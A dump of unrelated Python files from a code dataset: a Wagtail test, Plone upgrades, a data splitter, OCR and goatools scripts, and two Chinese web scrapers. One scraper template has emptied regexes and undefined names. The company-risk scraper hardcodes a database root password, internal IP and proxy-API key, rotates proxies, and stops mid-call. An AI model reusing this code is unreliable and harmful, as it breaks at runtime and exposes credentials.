models.SearchTestOldConfigList.get_search_fields()\n\n search_fields_dict = dict(\n ((field.field_name, type(field)), field)\n for field in search_fields\n )\n\n # Check that the fields were found\n self.assertEqual(len(search_fields_dict), 2)\n self.assertIn(('title', indexed.SearchField), search_fields_dict.keys())\n self.assertIn(('content', indexed.SearchField), search_fields_dict.keys())\n","sub_path":"wagtail/wagtailsearch/tests/test_indexed_class.py","file_name":"test_indexed_class.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640717756","text":"# -*- coding: utf-8 -*-\nfrom Products.CMFCore.utils import getToolByName\nfrom plone.app.contenttypes.utils import DEFAULT_TYPES\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom zope.component import queryUtility\nimport logging\nlogger = logging.getLogger(name=\"plone.app.contenttypes upgrade\")\n\n\ndef update_fti(context):\n \"\"\" Schema-files moved into their own folder after 1.0b1\n \"\"\"\n # Document\n fti = queryUtility(\n IDexterityFTI,\n name='Document'\n )\n fti.model_file = \"plone.app.contenttypes.schema:document.xml\"\n # File\n fti = queryUtility(\n IDexterityFTI,\n name='File'\n )\n fti.model_file = \"plone.app.contenttypes.schema:file.xml\"\n # Folder\n fti = queryUtility(\n IDexterityFTI,\n name='Folder'\n )\n fti.model_file = \"plone.app.contenttypes.schema:folder.xml\"\n # Image\n fti = queryUtility(\n IDexterityFTI,\n name='Image'\n )\n fti.model_file = \"plone.app.contenttypes.schema:image.xml\"\n # Link\n fti = queryUtility(\n IDexterityFTI,\n name='Link'\n )\n fti.model_file = \"plone.app.contenttypes.schema:link.xml\"\n # News Item\n fti = queryUtility(\n IDexterityFTI,\n name='News Item'\n )\n fti.model_file = \"plone.app.contenttypes.schema:news_item.xml\"\n\n\ndef enable_collection_behavior(context):\n \"\"\"Enable collection behavior on Collection.\"\"\"\n\n fti = queryUtility(\n IDexterityFTI,\n name='Collection'\n )\n behavior = 'plone.app.contenttypes.behaviors.collection.ICollection'\n if behavior in fti.behaviors:\n return\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n behaviors = tuple(behaviors)\n fti._updateProperty('behaviors', behaviors)\n\n\ndef migrate_to_richtext(context):\n \"\"\"Update fti's to add RichText behaviors and remove old text-fields.\"\"\"\n\n behavior = \"plone.app.contenttypes.behaviors.richtext.IRichText\"\n types = [\n \"Document\",\n \"News Item\",\n \"Event\",\n \"Collection\",\n ]\n for type_name in types:\n fti = queryUtility(\n IDexterityFTI,\n name=type_name\n )\n if not fti:\n continue\n if behavior in fti.behaviors:\n continue\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n fti._updateProperty('behaviors', tuple(behaviors))\n\n\ndef migrate_album_view(context):\n \"\"\"Migrate atct_album_view to album_view.\"\"\"\n\n # TODO: Don't reload the profile. Only change the settings.\n context.runImportStepFromProfile(\n 'profile-plone.app.contenttypes:default',\n 'typeinfo',\n )\n catalog = getToolByName(context, 'portal_catalog')\n search = catalog.unrestrictedSearchResults\n for brain in search(portal_type='Folder'):\n obj = brain.getObject()\n current = context.getLayout()\n if current == 'atct_album_view':\n obj.setLayout('album_view')\n\n\ndef enable_shortname_behavior(context):\n \"\"\"Add IShortName to all types.\"\"\"\n\n behavior = 'plone.app.dexterity.behaviors.id.IShortName'\n for type_id in DEFAULT_TYPES:\n fti = queryUtility(\n IDexterityFTI,\n name=type_id\n )\n if fti is None:\n continue\n\n if behavior in fti.behaviors:\n continue\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n behaviors = tuple(behaviors)\n fti._updateProperty('behaviors', behaviors)\n\n\ndef use_new_view_names(context):\n \"\"\"Migrate old view names to new view names.\"\"\"\n\n # TODO: Don't reload the profile. Only change the settings.\n context.runImportStepFromProfile(\n 'profile-plone.app.contenttypes:default',\n 'typeinfo',\n )\n catalog = getToolByName(context, 'portal_catalog')\n search = catalog.unrestrictedSearchResults\n\n def _fixup(portal_type, view_map):\n for brain in search(portal_type=portal_type):\n obj = brain.getObject()\n current = context.getLayout()\n if current in view_map.keys():\n obj.setLayout(view_map[current])\n logger.info(\"Set view to {} for {}\".format(\n view_map[current], obj.absolute_url()\n ))\n\n folder_view_map = { # OLD : NEW\n 'folder_listing': 'listing_view',\n 'folder_full_view': 'full_view',\n 'folder_summary_view': 'summary_view',\n 'folder_tabular_view': 'tabular_view',\n 'folder_album_view': 'album_view',\n 'atct_album_view': 'album_view',\n }\n collection_view_map = { # OLD : NEW\n 'view': 'listing_view',\n 'standard_view': 'listing_view',\n 'collection_view': 'listing_view',\n 'all_content': 'full_view',\n 'thumbnail_view': 'album_view',\n }\n _fixup('Folder', folder_view_map)\n _fixup('Plone Site', folder_view_map)\n _fixup('Collection', collection_view_map)\n","sub_path":"buildout-cache--/eggs/plone.app.contenttypes-1.2a9-py2.7.egg/plone/app/contenttypes/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"91935594","text":"import time\n\n__author__ = 'Arthur Fortes'\n\nimport os\nimport random\nimport operator\n\n\n'''\nGiven a set of data, this function is responsible for creating a set of training and testing.\n\nStandard file for reading:\n\nuser /t item /t information /n\n\nExample:\n\ndir = '/home/user/Documents/base/'\n\ncreate_set('user_artists.dat',\n 'test.dat',\n 'train.dat',\n directory)\n\n\nBy default algorithm divides the base into 80% for training and 20% for testing.\nTo change, simply set the percentage for the test variable \"test_ratio\".\n'''\n\n\ndef default_split(data, directory1, cross_fold=1, test_ratio=0.2):\n\n global train_set, test_set\n starting_point = time.time()\n\n print(\"Splitting database: \\n Train: \" + str((1-test_ratio)*100) + \"% \\n Test: \" + str(test_ratio*100) +\n \"% \\n Folds: \" + str(cross_fold))\n\n for fold in range(cross_fold):\n\n list_rank = list()\n new_dir = directory1 + str(fold)\n\n if not os.path.exists(new_dir):\n os.mkdir(new_dir)\n\n with open(data) as infile:\n for line in infile:\n line_file = line.split()\n if line.strip():\n list_rank.append((int(line_file[0]), int(line_file[1]), float(line_file[2])))\n\n start = int(len(list_rank) * test_ratio)\n list_test_users = 1\n list_train_users = 2\n count = 0\n\n while list_test_users != list_train_users:\n count += 1\n list_train_users = list()\n list_test_users = list()\n random.shuffle(list_rank)\n\n test_set = list_rank[-start:]\n test_set = sorted(test_set, key=operator.itemgetter(0, 1))\n [list_test_users.append(user[0]) for user in test_set]\n list_test_users = sorted(list(set(list_test_users)))\n\n train_set = list_rank[:-start]\n train_set = sorted(train_set, key=operator.itemgetter(0, 1))\n [list_train_users.append(user[0]) for user in test_set]\n list_train_users = sorted(list(set(list_train_users)))\n\n file_train1 = new_dir + '\\\\train.dat'\n with open(file_train1, 'w') as infile2:\n for user in train_set:\n infile2.write('%s\\t%s\\t%s\\n' % (user[0], user[1], user[2]))\n\n file_test1 = new_dir + '\\\\test.dat'\n with open(file_test1, 'w') as infile:\n for user in test_set:\n infile.write('%s\\t%s\\t%s\\n' % (user[0], user[1], user[2]))\n\n elapsed_time = time.time() - starting_point\n\n print(\"Runtime: \" + str(elapsed_time / 60) + \" minute(s)\")\n\n print(\"Split complete\")\n","sub_path":"split_base/default_split.py","file_name":"default_split.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"548045123","text":"#-*-coding:utf-8-*-\n#利用requests请求,正则表达式来解析网页,TXT、excel、数据库保存,带有headers,cookies,代理,\nimport re\nimport time\nimport os,pymysql,random\nimport xlrd,xlwt\nimport requests\n\nclass Spider(object):\n def __init__(self):#这个适用非excel储存\n iplist = ['61.135.217.7:80']\n proxies = random.choice(iplist)\n # proxies = {'http': proxies}\n proxies = {'http': 'http://' + proxies, 'https': 'https://' + proxies, }\n print(proxies)\n self.proxies = proxies\n referer=' '\n cookie=' '\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400'\n self.headers = {'User-Agent': user_agent, 'Referer': referer, 'Cookie': cookie}\n\n\n '''def __init__(self):#这个是适用excel储存\n\t\tself.m=0\n iplist = ['61.135.217.7:80']\n proxies = random.choice(iplist)\n # proxies = {'http': proxies}\n proxies = {'http': 'http://' + proxies, 'https': 'https://' + proxies, }\n print(proxies)\n self.proxies = proxies\n referer=' '\n cookie=' '\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400'\n self.headers = {'User-Agent': user_agent, 'Referer': referer, 'Cookie': cookie}\n self.shuju = xlwt.Workbook(encoding='utf-8')\n self.sheet = self.shuju.add_sheet(u'列表', cell_overwrite_ok=True)\n sheetcount = (u'编号', u'地址', u'标题', u'价格')\n for i in range(0, len(sheetcount)):\n self.sheet.write(0, i, sheetcount[i], self.set_style('Time new Roman', 220, True))\n self.shuju.save('xlsx.xlsx')'''\n\n def set_style(self, name, height, bold=False):\n style = xlwt.XFStyle() # 初始化样式\n font = xlwt.Font() # 为样式创建字体\n font.name = name\n font.bold = bold\n font.colour_index = 2\n font.height = height\n style.font = font\n return style\n def spider(self,url):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n shujus = re.findall(pattern1, response)\n for shuju in shujus:\n print(shuju)\n\n def txt(self,url):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n shujus = re.findall(pattern1, response)\n with open('txt.txt', 'a', encoding='utf-8') as f: # 不管存储过程发生什么错误都会保存\n for content in range(0,len(shujus)):\n print(content)\n f.write(content)\n def excel(self):\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n biaotis = re.findall(pattern1, response)\n pattern2 = re.compile(r'(.*?)')\n jiages = re.findall(pattern2, response)\n for i in range(0, len(dizhis)):\n data = [] # 建立空的list\n dizhi = dizhis[i]\n biaoti = biaotis[i]\n jiage = jiages[i]\n data.append(self.m + 1)\n data.append(dizhi)\n data.append(biaoti)\n data.append(jiage)\n for j in range(0, len(data)):\n self.sheet.write(self.m + 1, j, data[j])\n self.m = self.m + 1\n print(self.m)\n self.shuju.save('58tongcheng.xlsx')\n def base(self,url):\n db = pymysql.connect(host='localhost', user='root', password='mysqlmm', port=3306, db='douban') # db选择相应的数据库名称\n cursor = db.cursor()\n response = requests.get(url, headers=self.headers, proxies=self.proxies).text\n pattern = re.compile(r'(.*?)')\n scores = re.findall(pattern1, response)\n pattern2 = re.compile(r'(.*?)')\n renshus = re.findall(pattern2, response)\n pattern3 = re.compile(r'(.*?)')\n qitas = re.findall(pattern3, response)\n pattern4 = re.compile(r'(.*?)')\n tupians = re.findall(pattern4, response)\n\n for i in range(0,len(titles)):\n\n title = titles[i]\n score = scores[i]\n renshu = renshus[i]\n qita = qitas[i]\n tupian = tupians[i]\n\n data = {}\n data = {\n 'name': title,\n 'score': score,\n 'good': renshu\n }\n table = 'musics'\n keys = ','.join(data.keys())\n values = ','.join(['%s'] * len(data))\n update = ','.join([\" {key}=%s\".format(key=key) for key in data]) # 注意空格\n sql = 'INSERT INTO {table}({keys}) VALUES({values}) ON DUPLICATE KEY UPDATE'.format(table=table, keys=keys,\n values=values)\n sql = sql + update\n try:\n if cursor.execute(sql, tuple(data.values()) * 2): # 这是格式,第二个参数要有\n # if cursor.execute(sql,(title[i],score[i],renshu[i])):\n print('成功')\n db.commit() # 执行保存\n except:\n db.rollback()\n print('失败!')\n\n pass\nif __name__=='__main__':\n start=time.time()\n urls = ['https://music.douban.com/top250?start={}'.format(i * 25) for i in range(1, 20)]\n for url in urls:\n f=Spider()\n f.spider(url)\n end=time.time()\n print('总共花费的时间:',(end-start))","sub_path":"爬虫模板/re.py","file_name":"re.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"232316297","text":"x = 1\na = 0\nr = 0\nprint ('la nota minima es 1.0 y la nota maxima es 5.0. El estudiante necesita una nota de 3 o superior para aprobar')\nfor x in range(1,16):\n y = float(input(f'Ingresar nota del estudiante {x}'))\n\n if y >= 3:\n a=a+1\n else:\n r=r+1\n\nprint('El numero de estudiantes aprobados es de: '+ str(a))\nprint('El numero de estudiantes reprobados es de: '+ str(r))","sub_path":"Ejercicios/ejercicio 10.py","file_name":"ejercicio 10.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564840200","text":"import time\nimport pyocr\nfrom PIL import Image\nimport pyocr.builders\nimport cv2\nimport numpy as np\n\n####\n# activate label\n####\n\n#img : PIL image\ndef get_digit_ocr_info(img):\n result = None\n #start_time = time.time()\n #print('******** start convert_image_to_deadline *********')\n\n width, height=img.size\n\n tools = pyocr.get_available_tools()\n tool = tools[0]\n #print(tool)\n langs = tool.get_available_languages()\n #print(\"support langs: %s\" % \", \".join(langs))\n #lang = langs[0]\n lang = 'eng'\n digit_txt = tool.image_to_string(\n img,\n lang=lang,\n builder=pyocr.builders.DigitBuilder(tesseract_layout=6)\n )\n print('DigitBuilder', digit_txt)\n\n #print('******** end convert_image_to_deadline *********')\n return digit_txt\n\n\nvideo = cv2.VideoCapture(\"60fpx.MP4\")\nret, img = video.read()\nimg_win = img.copy()\nrect = (0, 0, img.shape[1], img.shape[0])\nsx = 0\nsy = 0\nabs_x = 0\nabs_y = 0\nabs_sx = 0\nabs_sy = 0\n\ndef callback(event, x, y, flags, param):\n global img, img_win, sx, sy, rect, abs_x, abs_y, abs_sx, abs_sy\n abs_x, abs_y = rect[0] + x, rect[1] + y\n\n if event == cv2.EVENT_LBUTTONDOWN:\n sx, sy = x, y\n abs_sx, abs_sy = abs_x, abs_y\n\n if flags == cv2.EVENT_FLAG_LBUTTON:\n img_win = img.copy()[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]]\n cv2.rectangle(img_win, (sx, sy), (x, y), (0, 0, 0), 2)\n\n if event == cv2.EVENT_LBUTTONUP:\n rect_x = np.clip(min(abs_sx, abs_x), 0, img.shape[1] - 2)\n rect_y = np.clip(min(abs_sy, abs_y), 0, img.shape[0] - 2)\n rect_w = np.clip(abs(abs_sx - abs_x), 1, img.shape[1] - rect_x)\n rect_h = np.clip(abs(abs_sy - abs_y), 1, img.shape[0] - rect_y)\n rect = (rect_x, rect_y, rect_w, rect_h)\n img_win = img.copy()[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]]\n\n\ncv2.namedWindow(\"img\", cv2.WINDOW_NORMAL)\ncv2.setMouseCallback(\"img\", callback)\nwhile(1):\n cv2.imshow(\"img\", img_win)\n k = cv2.waitKey(1)\n\n if k == ord('f'):\n break\n\n if k == ord(\"r\"):\n rect = (0, 0, img.shape[1], img.shape[0])\n img_win = img.copy()\n\n\nwhile ret:\n ret, img = video.read()\n cv2.imshow(\"video\", img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]])\n gray = Image.fromarray(cv2.cvtColor(img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]], cv2.COLOR_RGB2GRAY))\n num = get_digit_ocr_info(gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n\"\"\"\nim = cv2.imread(\"sample.png\")\ngray = Image.fromarray(cv2.cvtColor(im, cv2.COLOR_RGB2GRAY))\nget_digit_ocr_info(gray)\n\"\"\"","sub_path":"ocr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"408365268","text":"# -*- coding: UTF-8 -*-\n\"\"\"\npython find_enrichment.py study.file population.file gene-association.file\n\nThis program returns P-values for functional enrichment in a cluster of study\ngenes using Fisher's exact test, and corrected for multiple testing (including\nBonferroni, Holm, Sidak, and false discovery rate).\n\nAbout significance cutoff:\n--alpha: test-wise alpha; for each GO term, what significance level to apply\n (most often you don't need to change this other than 0.05 or 0.01)\n--pval: experiment-wise alpha; for the entire experiment, what significance\n level to apply after Bonferroni correction\n\"\"\"\n\nfrom __future__ import print_function\n\n__copyright__ = \"Copyright (C) 2010-2018, H Tang et al. All rights reserved.\"\n__author__ = \"various\"\n\nimport os\nimport sys\nimport argparse\nfrom goatools.go_enrichment import GOEnrichmentStudy\nfrom goatools.obo_parser import GODag\nfrom goatools.associations import read_associations\nfrom goatools.multiple_testing import Methods\nfrom goatools.pvalcalc import FisherFactory\n\n\ndef read_geneset(study_fn, pop_fn, compare=False):\n \"\"\"Open files containing genes. Return study genes and population genes.\"\"\"\n pop = set(_.strip() for _ in open(pop_fn) if _.strip())\n study = frozenset(_.strip() for _ in open(study_fn) if _.strip())\n # some times the pop is a second group to compare, rather than the\n # population in that case, we need to make sure the overlapping terms\n # are removed first\n if compare:\n common = pop & study\n pop |= study\n pop -= common\n study -= common\n sys.stderr.write(\"removed %d overlapping items\\n\" % (len(common)))\n sys.stderr.write(\"Set 1: {0}, Set 2: {1}\\n\".format(\n len(study), len(pop)))\n\n return study, pop\n\n\ndef _check_input_files(nspc, parser):\n \"\"\"check filename args. otherwise if one of the 3 filenames is bad\n it's hard to tell which one\"\"\"\n if not len(nspc.filenames) == 3:\n parser.print_help()\n msg = \"\"\"\n 3 Expected files; Expected content: study population association\",\n {} Actual files: {}\"\"\".format(len(nspc.filenames), ' '.join(nspc.filenames))\n raise Exception(msg)\n for fin in nspc.filenames:\n if not os.path.exists(fin):\n return \"*{}* does not exist\".format(fin)\n\n return False\n\n\ndef get_arg_parser():\n \"\"\"Get enrichment arg parser.\"\"\"\n\n #pylint: disable=invalid-name\n p = argparse.ArgumentParser(__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n p.add_argument('filenames', type=str, nargs=3,\n help='data/study data/population data/association')\n p.add_argument('--alpha', default=0.05, type=float,\n help=\"Test-wise alpha for multiple testing \")\n p.add_argument('--pval', default=.05, type=float,\n help=\"Only print out when uncorrected p-value < this value.\")\n p.add_argument('--compare', dest='compare', default=False,\n action='store_true',\n help=\"the population file as a comparison group. if this \"\n \"flag is specified, the population is used as the study \"\n \"plus the `population/comparison`\")\n p.add_argument('--ratio', dest='ratio', type=float, default=None,\n help=\"only show values where the difference between study \"\n \"and population ratios is greater than this. useful for \"\n \"excluding GO categories with small differences, but \"\n \"containing large numbers of genes. should be a value \"\n \"between 1 and 2. \")\n p.add_argument('--indent', dest='indent', default=False,\n action='store_true', help=\"indent GO terms\")\n p.add_argument('--obo', default=\"go-basic.obo\", type=str,\n help=\"Specifies location and name of the obo file\")\n p.add_argument('--no_propagate_counts', default=False, action='store_true',\n help=\"Do not propagate counts to parent terms\")\n p.add_argument('--outfile', default=None, type=str,\n help=\"Write enrichment results into xlsx or tsv file\")\n p.add_argument('--method', default=\"bonferroni,sidak,holm,fdr_bh\", type=str,\n help=Methods().getmsg_valid_methods())\n p.add_argument('--pvalcalc', default=\"fisher\", type=str,\n help=str(FisherFactory()))\n p.add_argument('--min_overlap', default=0.7, type=float,\n help=\"Check that a minimum amount of study genes are in the population\")\n\n if len(sys.argv) == 1:\n sys.exit(not p.print_help())\n\n args = p.parse_args() # Namespace object from argparse\n _check_input_files(args, p)\n return args\n\ndef rd_files(filenames, compare, prt=sys.stdout):\n \"\"\"Read files and return study and population.\"\"\"\n study_fn, pop_fn, assoc_fn = filenames\n assoc = read_associations(assoc_fn)\n study, pop = read_geneset(study_fn, pop_fn, compare=compare)\n if prt:\n prt.write(\"Study: {0} vs. Population {1}\\n\".format(len(study), len(pop)))\n return study, pop, assoc\n\ndef get_overlap(study, pop):\n \"\"\"Get he ratio of study genes which are in the population.\"\"\"\n return float(len(study & pop)) / len(study)\n\ndef chk_genes(study, pop, min_overlap):\n \"\"\"Check gene sets.\"\"\"\n if len(pop) < len(study):\n exit(\"\\nERROR: The study file contains more elements than the population file. \"\n \"Please check that the study file is a subset of the population file.\\n\")\n # check the fraction of genomic ids that overlap between study\n # and population\n overlap = get_overlap(study, pop)\n if overlap < 0.95:\n sys.stderr.write(\"\\nWARNING: only {} fraction of genes/proteins in study are found in \"\n \"the population background.\\n\\n\".format(overlap))\n if overlap <= min_overlap:\n exit(\"\\nERROR: only {} of genes/proteins in the study are found in the \"\n \"background population. Please check.\\n\".format(overlap))\n\n\ndef get_objgoea(pop, assoc, args):\n \"\"\"Run gene ontology enrichment analysis (GOEA).\"\"\"\n obo_dag = GODag(obo_file=args.obo)\n methods = args.method.split(\",\")\n propagate_counts = not args.no_propagate_counts\n return GOEnrichmentStudy(pop, assoc, obo_dag,\n propagate_counts=propagate_counts,\n alpha=args.alpha,\n pvalcalc=args.pvalcalc,\n methods=methods)\n\ndef prt_results(results, objgoea, args):\n \"\"\"Print GOEA results.\"\"\"\n if args.outfile is None:\n min_ratio = args.ratio\n if min_ratio is not None:\n assert 1 <= min_ratio <= 2\n objgoea.print_summary(results, min_ratio=min_ratio, indent=args.indent, pval=args.pval)\n else:\n # Users can print to both tab-separated file and xlsx file in one run.\n outfiles = args.outfile.split(\",\")\n if args.pval is not None:\n # Only print results when uncorrected p-value < this value.A\n num_orig = len(results)\n results = [r for r in results if r.p_uncorrected <= args.pval]\n print(\"{N:7,} of {M:,} results have uncorrected P-values <= {PVAL}=pval\\n\".format(\n N=len(results), M=num_orig, PVAL=args.pval))\n for outfile in outfiles:\n if outfile.endswith(\".xlsx\"):\n objgoea.wr_xlsx(outfile, results, indent=args.indent)\n else:\n objgoea.wr_tsv(outfile, results, indent=args.indent)\n\n# Copyright (C) 2010-2018, H Tang et al. All rights reserved.\n","sub_path":"goatools/cli/find_enrichment.py","file_name":"find_enrichment.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"545665420","text":"# encoding:utf-8\nimport json\nimport re\n\nimport requests\nimport time\n\nfrom sqlalchemy import Column, String, create_engine, Integer\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# 创建对象的基类:\nBase = declarative_base()\n\n\nclass sheet1(Base):\n # 表的名字:\n __tablename__ = 'sheet1'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n\nclass company_patent(Base):\n # 表的名字:\n __tablename__ = 'company_patent_test'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n apply_public_date = Column(String(256))\n patent_name = Column(String(256))\n apply_num = Column(String(256))\n apply_public_num = Column(String(256))\n type = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\nclass company_software(Base):\n # 表的名字:\n __tablename__ = 'company_software_test'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n author_nationality = Column(String(256))\n simple_name = Column(String(256))\n reg_num = Column(String(256))\n full_name = Column(String(256))\n cat_num = Column(String(256))\n version = Column(String(256))\n reg_date = Column(String(256))\n publish_date = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\nclass risk_administrative_penalties(Base):\n # 表的名字:\n __tablename__ = 'risk_administrative_penalties'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n punish_number = Column(String(256))\n punish_reason = Column(String(256))\n punish_content = Column(String(256))\n punish_date = Column(String(256))\n punish_department = Column(String(256))\n show_type_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_break_rebuild(Base):\n # 表的名字:\n __tablename__ = 'risk_break_rebuild'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n submit_time = Column(String(256))\n case_no = Column(String(256))\n case_type = Column(String(256))\n applicant = Column(String(256))\n respondent = Column(String(256))\n court = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_business_exception(Base):\n # 表的名字:\n __tablename__ = 'risk_business_exception'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n put_date = Column(String(256))\n put_department = Column(String(256))\n put_reason = Column(String(256))\n put_reason_type = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_dishonest(Base):\n # 表的名字:\n __tablename__ = 'risk_dishonest'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n reg_date = Column(String(256))\n publish_date = Column(String(256))\n gist_unit = Column(String(256))\n case_code = Column(String(256))\n gis_tid = Column(String(256))\n disrupt_type_name = Column(String(256))\n performance = Column(String(256))\n i_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_environmental_money(Base):\n # 表的名字:\n __tablename__ = 'risk_environmental_money'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n publish_time = Column(String(256))\n punish_number = Column(String(256))\n punish_reason = Column(String(256))\n punish_content = Column(String(256))\n punish_department = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_home_mortgage(Base):\n # 表的名字:\n __tablename__ = 'risk_home_mortgage'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n reg_date = Column(String(256))\n reg_num = Column(String(256))\n people_info = Column(String(256))\n mort_gagor_info = Column(String(256))\n over_view_type = Column(String(256))\n over_view_term = Column(String(256))\n amount = Column(String(256))\n reg_department = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_limit_consumer(Base):\n # 表的名字:\n __tablename__ = 'risk_limit_consumer'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n publish_date = Column(String(256))\n case_code = Column(String(256))\n qy_info = Column(String(256))\n x_name = Column(String(256))\n applicant = Column(String(256))\n case_create_time = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_owe_tax_notice(Base):\n # 表的名字:\n __tablename__ = 'risk_owe_tax_notice'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n legalperson_name = Column(String(256))\n location = Column(String(256))\n name = Column(String(256))\n new_own_tax_balance = Column(String(256))\n own_tax_balance = Column(String(256))\n publish_date = Column(String(256))\n tax_category = Column(String(256))\n taxId_number = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_serious_violation(Base):\n # 表的名字:\n __tablename__ = 'risk_serious_violation'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n put_reason = Column(String(256))\n put_department = Column(String(256))\n put_date = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_tax_money(Base):\n # 表的名字:\n __tablename__ = 'risk_tax_money'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n case_type = Column(String(256))\n department = Column(String(256))\n taxpayer_name = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\nclass risk_limit_out_city(Base):\n # 表的名字:\n __tablename__ = 'risk_limit_out_city'\n\n # 表的结构:\n id = Column(Integer(), primary_key=True, autoincrement=True)\n company_id = Column(String(256))\n company_num = Column(String(256))\n issue_date = Column(String(256))\n human_name = Column(String(256))\n executed = Column(String(256))\n executed_address = Column(String(256))\n applicant = Column(String(256))\n money = Column(String(256))\n court = Column(String(256))\n\n gmt_created = Column(String(256))\n gmt_updated = Column(String(256))\n\n\n# 初始化数据库连接:\nengine = create_engine('mysql+mysqlconnector://root:BOOT-xwork1024@192.168.2.97:3306/spider')\n# 创建DBSession类型:\nDBSession = sessionmaker(bind=engine)\n# 创建session对象:\nsession = DBSession()\n\n\ndef dl(proxys):\n time.sleep(0.4)\n try:\n dlurl = 'http://api.ip.data5u.com/dynamic/get.html?order=fba1729fce7d27397dc2db1dc5db9977&random=2&sep=3'\n resp = requests.get(dlurl).text\n resp = re.sub(r'\\n', '', resp)\n proxy = {\n 'https': resp\n }\n proxys[0] = proxy\n print(proxys)\n except Exception as e:\n dl(proxys)\n\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\"\n}\n\n\n# 软著3\ndef soft(company_id, company_num):\n f = False\n max_pages = 100\n # for page in range(1, max_pages + 1):\n # if f:\n # break\n time.sleep(0.4)\n while 1:\n try:\n # data = {\"_\": \"1662602428454\", \"id\": \"4997169666\", \"pageSize\": 100, \"pageNum\": page, \"regYear\": \"-100\", }\n data = {\"_\": \"1662602428454\", \"id\": company_num, \"pageSize\": 100, \"pageNum\": 1, \"regYear\": \"-100\", }\n\n d = requests.get(\n 